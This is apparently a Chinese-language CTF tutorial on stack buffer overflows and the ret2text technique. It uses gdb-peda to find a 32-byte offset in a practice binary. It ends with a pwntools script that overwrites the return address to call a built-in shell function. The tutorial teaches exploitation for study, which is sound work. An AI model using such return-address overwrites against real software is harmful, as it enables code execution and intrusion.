PWN从入门到放弃(5)——栈溢出之ret2text
0x00 栈溢出
Buffer Overflow(缓冲区溢出)
因为程序本身没有正确检查输入数据的大小,造成攻击者可以输入比buffer还要大的数据,使得超出部分覆盖程序的其他部分,影响程序执行。
# include <stdio.h>
chr name[50]; //设置name变量,大小为50个字节
int main(){
setvbuf(stdout,0,2,0);
printf("Name:");
read(0,name,50); //读取50个字节到name
char buf[20]; //设置buf变量,大小为20个字节
printf("Try your best:");
gets(buf); //读取用户输入到buf(不限长度)
return;
}
从上面代码我们可以看出,read()函数限定了接收数据的字节数,并没有造成溢出,但是gets()函数没有限制接收数据的大小,若用户输入大于20个字节的数据,就会造成溢出。
Stack Overflow(栈溢出)
又称stack smashing,专指在stack上的Overflow,利用方式简单,可直接覆盖return address和控制参数,不管是什么漏洞,如果能找到stack overflow,之后就是标准动作了。
常见易溢出函数
gets;scanf;strcpy;sprintf;memcpy;strcat……
0x01 ret2text
Return to text,控制程序的返回地址到原本程序中的函数(代码)。
例如程序中有类似function:
- system(‘/bin/sh’)
- execve(‘/bin/sh’,NULL,NULL)
就可以跳转到这个function,function的地址可以通过objdump或者ida来查找。
0x02 例题
1)查看文件信息
先将题目拷贝到之前搭建好的pwn环境中,然后使用file和checksec命令查看题目信息。
$ file ./ret2text
$ checksec ./ret2text
2)查看程序大概流程
运行一下程序,了解程序的大概流程
3)分析程序&查找漏洞点
将程序扔到ida pro中分析
看到左侧函数窗口中有vuln()函数,双击进入
双击&buf,查看buf大小
我们看到buf的大小为1C+4,换算成10进制为32
但是read()函数可以读入的大小为50,那么这里很明显存在栈溢出
我们继续看左侧函数窗口,发现shell()函数,双击进入
shell()函数中我们发现了 system(“/bin/sh”)
也就是说我们调用shell()函数会给我们返回一个shell
4)计算溢出偏移量
将程序导入gdb
$ gdb ./ret2text
输入r或者run,将程序运行起来
当提示我们输入的时候,按ctrl+c将程序中断
我们会看到这样一个界面,在终端输入
gdb-peda$ pattern create 100
工具会自动帮我们生成一个100长度的字符串
我们将字符串复制,并输入c敲回车,继续运行程序
将复制的字符串粘贴,并回车
我们看到程序又被中断了,并且在DISASM窗口中提示Invalid address 0x41412941,程序的返回地址被我们的字符串覆盖了。
第三篇我们讲过,EIP寄存器为指令寄存器,指向处理器下条等待执行的指令地址,正常情况当程序运行完当前函数EIP应该指向返回地址,并跳转到返回地址继续执行,我们看EIP寄存器的值为0x41412941,对应字符为“A)AA”,正是我们输入字符串中的字符。
也就是说,我们找到“A)AA”在字符串中的位置,输入前面那些字符,并将“A)AA”替换成一个函数地址,那么当程序执行完当前函数,就会跳转到我们输入的函数地址继续执行。
联想到我们之前找到的shell函数,我们将返回地址替换成shell函数的地址,那么程序执行完当前函数就会给我们返回一个shell。
我们可以通过pattern工具直接算出“A)AA”在字符串中的位置
gdb-peda$ pattern offset 0x41412941
我们计算出偏移量为32。
接下来我们就可以构造我们的payload了。
5)构造payload
from pwn import *
r = process('./ret2text')
padding = 32
shell_addr = 0x0804851d
payload = 'a' * padding
payload += p32(shell_addr)
r.sendline(payload)
r.interactive()